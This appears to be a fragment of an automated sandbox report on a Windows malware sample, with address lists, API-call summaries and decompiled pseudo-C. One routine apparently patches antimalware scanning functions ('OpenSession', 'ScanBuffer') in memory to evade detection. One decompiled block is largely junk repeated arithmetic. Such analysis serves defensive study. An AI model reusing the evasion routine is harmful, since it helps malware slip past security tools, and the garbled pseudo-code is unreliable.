                                                                                                0x02185f74
                                                                                                0x02185f74
                                                                                                0x02185f76
                                                                                                0x02185f78
                                                                                                0x02185f78
                                                                                                0x02185f7b
                                                                                                0x02185f7c
                                                                                                0x02185f7d
                                                                                                0x02185f7e
                                                                                                0x02185f7f
                                                                                                0x02185f8d
                                                                                                0x02185f8e
                                                                                                0x02185f93
                                                                                                0x02185f96
                                                                                                0x02185f9e
                                                                                                0x02185fa3
                                                                                                0x02185fa4
                                                                                                0x02185fab
                                                                                                0x02185fc2
                                                                                                0x02185fad
                                                                                                0x02185fb4
                                                                                                0x02185fb4
                                                                                                0x02185fc7
                                                                                                0x02185fcc
                                                                                                0x02185fce
                                                                                                0x02185fdb
                                                                                                0x02185fed
                                                                                                0x02185ff5
                                                                                                0x02186000
                                                                                                0x02186012
                                                                                                0x0218601a
                                                                                                0x0218601b
                                                                                                0x02186020
                                                                                                0x02186025
                                                                                                0x02186027
                                                                                                0x02186034
                                                                                                0x02186046
                                                                                                0x0218604e
                                                                                                0x02186059
                                                                                                0x0218606b
                                                                                                0x02186073
                                                                                                0x02186074
                                                                                                0x02186079
                                                                                                0x021862ff
                                                                                                0x021862ff
                                                                                                0x02186308
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02186084
                                                                                                0x02186092
                                                                                                0x02186097
                                                                                                0x0218609c
                                                                                                0x021860a1
                                                                                                0x021860a9
                                                                                                0x021860ad
                                                                                                0x021860b3
                                                                                                0x021860be
                                                                                                0x021860bf
                                                                                                0x021860c4
                                                                                                0x021860c6
                                                                                                0x021860cc
                                                                                                0x021860d1
                                                                                                0x021860d3
                                                                                                0x021860e0
                                                                                                0x021860f2
                                                                                                0x021860fa
                                                                                                0x02186105
                                                                                                0x02186117
                                                                                                0x0218611f
                                                                                                0x02186120
                                                                                                0x02186125
                                                                                                0x0218612a
                                                                                                0x0218612c
                                                                                                0x02186139
                                                                                                0x0218614b
                                                                                                0x02186153
                                                                                                0x0218615e
                                                                                                0x02186170
                                                                                                0x02186178
                                                                                                0x02186179
                                                                                                0x02186181
                                                                                                0x02186187
                                                                                                0x02186195
                                                                                                0x02186195
                                                                                                0x0218619a
                                                                                                0x0218619f
                                                                                                0x021861a3
                                                                                                0x021861ba
                                                                                                0x021861c7
                                                                                                0x021861a5
                                                                                                0x021861a5
                                                                                                0x021861b3
                                                                                                0x021861b3
                                                                                                0x021862ec
                                                                                                0x021862ee
                                                                                                0x021862f0
                                                                                                0x021862f2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021861d0
                                                                                                0x021861d5
                                                                                                0x021861d7
                                                                                                0x021862bb
                                                                                                0x021862bb
                                                                                                0x021862be
                                                                                                0x021862c9
                                                                                                0x021862cf
                                                                                                0x021862da
                                                                                                0x021861dd
                                                                                                0x021861dd
                                                                                                0x021861e2
                                                                                                0x021861e4
                                                                                                0x021861f1
                                                                                                0x02186203
                                                                                                0x0218620b
                                                                                                0x02186216
                                                                                                0x02186228
                                                                                                0x02186230
                                                                                                0x02186231
                                                                                                0x02186236
                                                                                                0x0218623b
                                                                                                0x0218623d
                                                                                                0x0218624a
                                                                                                0x0218625c
                                                                                                0x02186264
                                                                                                0x0218626f
                                                                                                0x02186281
                                                                                                0x02186289
                                                                                                0x0218628a
                                                                                                0x0218629f
                                                                                                0x021862aa
                                                                                                0x021862aa
                                                                                                0x021862e1
                                                                                                0x021862e7
                                                                                                0x021862e9
                                                                                                0x021862e9
                                                                                                0x021862e9
                                                                                                0x021862f8
                                                                                                0x021862f8
                                                                                                0x021862f8
                                                                                                0x02186310
                                                                                                0x02186313
                                                                                                0x02186316
                                                                                                0x02186328

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,02186329,?,?,?,?,0000000C,00000000,00000000), ref: 02185FA4
                                                                                                  • Part of subcall function 02185958: lstrcmpiA.KERNEL32(00000000,00000000,00000000,02185A18), ref: 021859D5
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                  • Part of subcall function 02185BC0: GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,02185C73), ref: 02185BED
                                                                                                  • Part of subcall function 02185BC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185BF3
                                                                                                  • Part of subcall function 02185BC0: GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C07
                                                                                                  • Part of subcall function 02185BC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185C0D
                                                                                                  • Part of subcall function 02185BC0: CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle$AddressModuleProc$LibraryMemory$CloseCurrentFlushFreeInetLoadMoveOfflineProcessVirtuallstrcmpi
                                                                                                • String ID: OpenSession$ScanBuffer$teSe
                                                                                                • API String ID: 2575397957-3424172483
                                                                                                • Opcode ID: 8998510870580c10ed5f04136f671a216c911225c196bb11df1d45379b554bd4
                                                                                                • Instruction ID: c5eaa153c38b2d77ef385c0f01c2966f53f23016ab33f22c4e262047df53c4c6
                                                                                                • Opcode Fuzzy Hash: 8998510870580c10ed5f04136f671a216c911225c196bb11df1d45379b554bd4
                                                                                                • Instruction Fuzzy Hash: B6B10F35AC0248DFDB11FB94D4D0A9EB7FAEF88700B518466E815AB314DB30AD52CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218EE56 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 231threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E0218EE56(intOrPtr* __eax, signed int __ebx, signed int* __ecx, char __edx, signed int __esi) {
				intOrPtr* _t35;
				intOrPtr* _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				void* _t49;
				long _t56;
				signed int _t65;
				void* _t66;

				asm("sbb [eax], al");
				 *__eax =  *__eax + __eax;
				asm("pushad");
				asm("out dx, al");
				asm("sbb [edx], al");
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				asm("sbb [edx], al");
				asm("cld");
				_pop(ss);
				_t35 = __eax + __edx +  *((intOrPtr*)(__eax + __edx));
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *_t35 =  *_t35 + _t35;
				 *((intOrPtr*)(_t35 + 0x480218f0)) =  *((intOrPtr*)(_t35 + 0x480218f0)) + __ebx;
				_t36 = _t35 +  *_t35;
				 *_t36 =  *_t36 + _t36;
				 *_t36 =  *_t36 + _t36;
				 *_t36 =  *_t36 + _t36;
				 *_t36 =  *_t36 + _t36;
				 *_t36 =  *_t36 + _t36;
				 *_t36 =  *_t36 + _t36;
				 *_t36 =  *_t36 + _t36;
				 *((intOrPtr*)(_t36 + __esi * 8 - 0x31e3fde8)) =  *((intOrPtr*)(_t36 + __esi * 8 - 0x31e3fde8)) + __ecx;
				ss = 0x17;
				_t37 = _t36 +  *_t36;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *((intOrPtr*)(__ecx + __esi * 8)) =  *((intOrPtr*)(__ecx + __esi * 8)) + __edx;
				asm("sbb [edx], al");
				_pop(ss);
				_t39 = _t37 +  *((intOrPtr*)(__ecx + 0x18 + __esi * 8)) +  *((intOrPtr*)(_t37 +  *((intOrPtr*)(__ecx + 0x18 + __esi * 8)) + 0x217fe));
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				asm("int1");
				asm("sbb [edx], al");
				asm("movsb");
				_t42 =  *ss() +  *_t41;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				_t43 = _t42 + __ebx;
				asm("int1");
				asm("sbb [edx], al");
				asm("sbb [edx], al");
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				asm("invalid");
				asm("sbb [edx], al");
				asm("lodsb");
				asm("sbb [edx], al");
				_t44 = _t66 + 1;
				asm("repne sbb [edx], al");
				 *((char*)(_t44 + __ebx + 2)) = __edx;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				 *_t44 =  *_t44 + _t44;
				asm("pushfd");
				asm("repne sbb [edx], al");
				asm("cld");
				_t45 = _t44 +  *_t44;
				 *_t45 =  *_t45 + _t45;
				 *((intOrPtr*)(_t43 + 0x18 + _t65 * 8)) =  *((intOrPtr*)(_t43 + 0x18 + _t65 * 8)) + _t45;
				_t46 = _t45 +  *((intOrPtr*)(__edx));
				 *_t46 =  *_t46 + _t46;
				asm("sbb [edx], al");
				asm("enter 0x190a, 0x2");
				asm("rcl byte [eax+0x218], 0x0");
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *__ecx = __ecx +  *__ecx;
				 *((intOrPtr*)((__ebx |  *__ecx) + 0x1915b02d)) =  *((intOrPtr*)((__ebx |  *__ecx) + 0x1915b02d)) + __ecx;
				_t49 = __ecx +  *((intOrPtr*)(_t46 + __ecx));
				if(_t49 < 0) {
					E02172A1C();
					 *0x219000c = 2;
					 *0x2191014 = 0x2171188;
					 *0x2191018 = 0x2171198;
					 *0x2191046 = 2;
					 *0x2191000 = E0217581C;
					if(E02173AD0() != 0) {
						_t51 = E02173B00();
					}
					E02173BC4(_t51);
					 *0x219104c = 0xd7b0;
					 *0x2191218 = 0xd7b0;
					 *0x21913e4 = 0xd7b0;
					 *0x219103c = GetCommandLineA();
					 *0x2191038 = E021712C0();
					 *0x21915b4 = GetACP();
					_t56 = GetCurrentThreadId();
					 *0x2191030 = _t56;
					return _t56;
				}
				return _t49;
			}
















                                                                                                0x0218ee58
                                                                                                0x0218ee5a
                                                                                                0x0218ee5c
                                                                                                0x0218ee5d
                                                                                                0x0218ee5e
                                                                                                0x0218ee60
                                                                                                0x0218ee62
                                                                                                0x0218ee64
                                                                                                0x0218ee66
                                                                                                0x0218ee6a
                                                                                                0x0218ee6c
                                                                                                0x0218ee6d
                                                                                                0x0218ee6f
                                                                                                0x0218ee71
                                                                                                0x0218ee73
                                                                                                0x0218ee75
                                                                                                0x0218ee77
                                                                                                0x0218ee7f
                                                                                                0x0218ee81
                                                                                                0x0218ee83
                                                                                                0x0218ee85
                                                                                                0x0218ee87
                                                                                                0x0218ee89
                                                                                                0x0218ee8b
                                                                                                0x0218ee8d
                                                                                                0x0218ee8f
                                                                                                0x0218ee96
                                                                                                0x0218ee97
                                                                                                0x0218ee99
                                                                                                0x0218ee9b
                                                                                                0x0218ee9d
                                                                                                0x0218ee9f
                                                                                                0x0218eea1
                                                                                                0x0218eea3
                                                                                                0x0218eea5
                                                                                                0x0218eea7
                                                                                                0x0218eea9
                                                                                                0x0218eeab
                                                                                                0x0218eead
                                                                                                0x0218eeaf
                                                                                                0x0218eeb2
                                                                                                0x0218eeb6
                                                                                                0x0218eebb
                                                                                                0x0218eec1
                                                                                                0x0218eec3
                                                                                                0x0218eec5
                                                                                                0x0218eec9
                                                                                                0x0218eeca
                                                                                                0x0218eecc
                                                                                                0x0218eecf
                                                                                                0x0218eed1
                                                                                                0x0218eed3
                                                                                                0x0218eed5
                                                                                                0x0218eed7
                                                                                                0x0218eed9
                                                                                                0x0218eeda
                                                                                                0x0218eede
                                                                                                0x0218eee0
                                                                                                0x0218eee2
                                                                                                0x0218eee4
                                                                                                0x0218eee6
                                                                                                0x0218eee8
                                                                                                0x0218eeea
                                                                                                0x0218eeec
                                                                                                0x0218eeee
                                                                                                0x0218eef0
                                                                                                0x0218eef2
                                                                                                0x0218eef4
                                                                                                0x0218eef6
                                                                                                0x0218eef8
                                                                                                0x0218eef9
                                                                                                0x0218eefc
                                                                                                0x0218ef00
                                                                                                0x0218ef02
                                                                                                0x0218ef04
                                                                                                0x0218ef06
                                                                                                0x0218ef08
                                                                                                0x0218ef0a
                                                                                                0x0218ef0c
                                                                                                0x0218ef0e
                                                                                                0x0218ef10
                                                                                                0x0218ef11
                                                                                                0x0218ef14
                                                                                                0x0218ef17
                                                                                                0x0218ef19
                                                                                                0x0218ef1b
                                                                                                0x0218ef1f
                                                                                                0x0218ef21
                                                                                                0x0218ef2a
                                                                                                0x0218ef2c
                                                                                                0x0218ef30
                                                                                                0x0218ef37
                                                                                                0x0218ef39
                                                                                                0x0218ef3b
                                                                                                0x0218ef3d
                                                                                                0x0218ef3f
                                                                                                0x0218ef41
                                                                                                0x0218ef43
                                                                                                0x0218ef45
                                                                                                0x0218ef47
                                                                                                0x0218ef49
                                                                                                0x0218ef4b
                                                                                                0x0218ef4d
                                                                                                0x0218ef4f
                                                                                                0x0218ef51
                                                                                                0x0218ef53
                                                                                                0x0218ef55
                                                                                                0x0218ef57
                                                                                                0x0218ef59
                                                                                                0x0218ef5b
                                                                                                0x0218ef5d
                                                                                                0x0218ef5f
                                                                                                0x0218ef61
                                                                                                0x0218ef63
                                                                                                0x0218ef65
                                                                                                0x0218ef67
                                                                                                0x0218ef69
                                                                                                0x0218ef6b
                                                                                                0x0218ef6d
                                                                                                0x0218ef6f
                                                                                                0x0218ef71
                                                                                                0x0218ef73
                                                                                                0x0218ef75
                                                                                                0x0218ef77
                                                                                                0x0218ef79
                                                                                                0x0218ef7b
                                                                                                0x0218ef7d
                                                                                                0x0218ef7f
                                                                                                0x0218ef81
                                                                                                0x0218ef83
                                                                                                0x0218ef85
                                                                                                0x0218ef87
                                                                                                0x0218ef89
                                                                                                0x0218ef8b
                                                                                                0x0218ef8d
                                                                                                0x0218ef8f
                                                                                                0x0218ef91
                                                                                                0x0218ef93
                                                                                                0x0218ef95
                                                                                                0x0218ef97
                                                                                                0x0218ef99
                                                                                                0x0218ef9b
                                                                                                0x0218ef9d
                                                                                                0x0218ef9f
                                                                                                0x0218efa1
                                                                                                0x0218efa3
                                                                                                0x0218efa5
                                                                                                0x0218efa7
                                                                                                0x0218efa9
                                                                                                0x0218efab
                                                                                                0x0218efad
                                                                                                0x0218efaf
                                                                                                0x0218efb1
                                                                                                0x0218efb3
                                                                                                0x0218efb5
                                                                                                0x0218efb7
                                                                                                0x0218efb9
                                                                                                0x0218efbb
                                                                                                0x0218efbd
                                                                                                0x0218efbf
                                                                                                0x0218efc1
                                                                                                0x0218efc3
                                                                                                0x0218efc5
                                                                                                0x0218efc7
                                                                                                0x0218efc9
                                                                                                0x0218efcb
                                                                                                0x0218efcd
                                                                                                0x0218efcf
                                                                                                0x0218efd1
                                                                                                0x0218efd3
                                                                                                0x0218efd5
                                                                                                0x0218efd7
                                                                                                0x0218efd9
                                                                                                0x0218efdb
                                                                                                0x0218efdd
                                                                                                0x0218efdf
                                                                                                0x0218efe1
                                                                                                0x0218efe3
                                                                                                0x0218efe5
                                                                                                0x0218efe7
                                                                                                0x0218efe9
                                                                                                0x0218efeb
                                                                                                0x0218efed
                                                                                                0x0218efef
                                                                                                0x0218eff1
                                                                                                0x0218eff3
                                                                                                0x0218eff5
                                                                                                0x0218eff7
                                                                                                0x0218eff9
                                                                                                0x0218effb
                                                                                                0x0218effd
                                                                                                0x0218efff
                                                                                                0x0218f005
                                                                                                0x0218f007
                                                                                                0x0218f00d
                                                                                                0x0218f012
                                                                                                0x0218f019
                                                                                                0x0218f023
                                                                                                0x0218f02d
                                                                                                0x0218f034
                                                                                                0x0218f045
                                                                                                0x0218f047
                                                                                                0x0218f047
                                                                                                0x0218f04c
                                                                                                0x0218f051
                                                                                                0x0218f05a
                                                                                                0x0218f063
                                                                                                0x0218f071
                                                                                                0x0218f07b
                                                                                                0x0218f085
                                                                                                0x0218f08a
                                                                                                0x0218f08f
                                                                                                0x00000000
                                                                                                0x0218f08f
                                                                                                0x0218f094

                                                                                                APIs
                                                                                                  • Part of subcall function 02173AD0: GetKeyboardType.USER32 ref: 02173AD5
                                                                                                  • Part of subcall function 02173AD0: GetKeyboardType.USER32 ref: 02173AE1
                                                                                                • GetCommandLineA.KERNEL32 ref: 0218F06C
                                                                                                • GetACP.KERNEL32 ref: 0218F080
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0218F08A
                                                                                                  • Part of subcall function 02173B00: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B22
                                                                                                  • Part of subcall function 02173B00: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B55
                                                                                                  • Part of subcall function 02173B00: RegCloseKey.ADVAPI32(?,02173B78,00000000,?,00000004,00000000,02173B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02173B6B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                • String ID: (4|
                                                                                                • API String ID: 3316616684-730202282
                                                                                                • Opcode ID: e5394358e98792127c9212b5976f6af5417249ef4ff760f89d05d2f6017d1b55
                                                                                                • Instruction ID: 0fa64292ceb727d782a7fe9e46e5cb04006a15c95765f084d37945afc5a090cb
                                                                                                • Opcode Fuzzy Hash: e5394358e98792127c9212b5976f6af5417249ef4ff760f89d05d2f6017d1b55
                                                                                                • Instruction Fuzzy Hash: FE41801548E3C26FC713AB7118A42967FB15E5321471E08CFC4C4DF1A3E61906AECB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217ACF4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 81%
                                                                                                			E0217ACF4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x217aec4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E021748A0(__edx);
				E0217A9B8(GetThreadLocale(), 0x217aedc, 0x1009,  &_v12);
				if(E02177DC4(0x217aedc, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						__eflags = _t92 - E02174B60(_t124);
						if(__eflags > 0) {
							goto L28;
						}
						asm("bt [0x219082c], eax");
						if(__eflags >= 0) {
							_t45 = E02178328(_t124 + _t92 - 1, 2, 0x217aee0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E02178328(_t124 + _t92 - 1, 4, 0x217aef0);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E02178328(_t124 + _t92 - 1, 2, 0x217af08);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E02174B6C(_t122, 0x217af20);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E02174A88();
												E02174B6C(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E02174B6C(_t122, 0x217af14);
										_t92 = _t92 + 1;
									}
								} else {
									E02174B6C(_t122, 0x217af00);
									_t92 = _t92 + 3;
								}
							} else {
								E02174B6C(_t122, 0x217aeec);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0217BC90(_t124, _t92);
							E02174DC4(_t124, _v8, _t92,  &_v20);
							E02174B6C(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x21938c8; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E021748F4(_t122, _t124);
					} else {
						while(_t92 <= E02174B60(_t124)) {
							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E02174A88();
									E02174B6C(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0217AECB);
				return E021748C4( &_v24, 4);
			}






















                                                                                                0x0217acf4
                                                                                                0x0217acf9
                                                                                                0x0217acfa
                                                                                                0x0217acfb
                                                                                                0x0217acfc
                                                                                                0x0217acfd
                                                                                                0x0217ad01
                                                                                                0x0217ad03
                                                                                                0x0217ad07
                                                                                                0x0217ad08
                                                                                                0x0217ad0d
                                                                                                0x0217ad10
                                                                                                0x0217ad13
                                                                                                0x0217ad1a
                                                                                                0x0217ad32
                                                                                                0x0217ad4a
                                                                                                0x0217ae9a
                                                                                                0x0217aea1
                                                                                                0x0217aea3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217adb9
                                                                                                0x0217adc0
                                                                                                0x0217adfe
                                                                                                0x0217ae03
                                                                                                0x0217ae05
                                                                                                0x0217ae27
                                                                                                0x0217ae2c
                                                                                                0x0217ae2e
                                                                                                0x0217ae4f
                                                                                                0x0217ae54
                                                                                                0x0217ae56
                                                                                                0x0217ae6c
                                                                                                0x0217ae6c
                                                                                                0x0217ae6e
                                                                                                0x0217ae74
                                                                                                0x0217ae7b
                                                                                                0x0217ae70
                                                                                                0x0217ae70
                                                                                                0x0217ae72
                                                                                                0x0217ae8a
                                                                                                0x0217ae94
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217ae72
                                                                                                0x0217ae58
                                                                                                0x0217ae5f
                                                                                                0x0217ae64
                                                                                                0x0217ae64
                                                                                                0x0217ae30
                                                                                                0x0217ae37
                                                                                                0x0217ae3c
                                                                                                0x0217ae3c
                                                                                                0x0217ae07
                                                                                                0x0217ae0e
                                                                                                0x0217ae13
                                                                                                0x0217ae13
                                                                                                0x0217ae99
                                                                                                0x0217ae99
                                                                                                0x0217adc2
                                                                                                0x0217adcb
                                                                                                0x0217add9
                                                                                                0x0217ade3
                                                                                                0x0217ade8
                                                                                                0x0217ade8
                                                                                                0x0217adc0
                                                                                                0x0217ad50
                                                                                                0x0217ad50
                                                                                                0x0217ad55
                                                                                                0x0217ad58
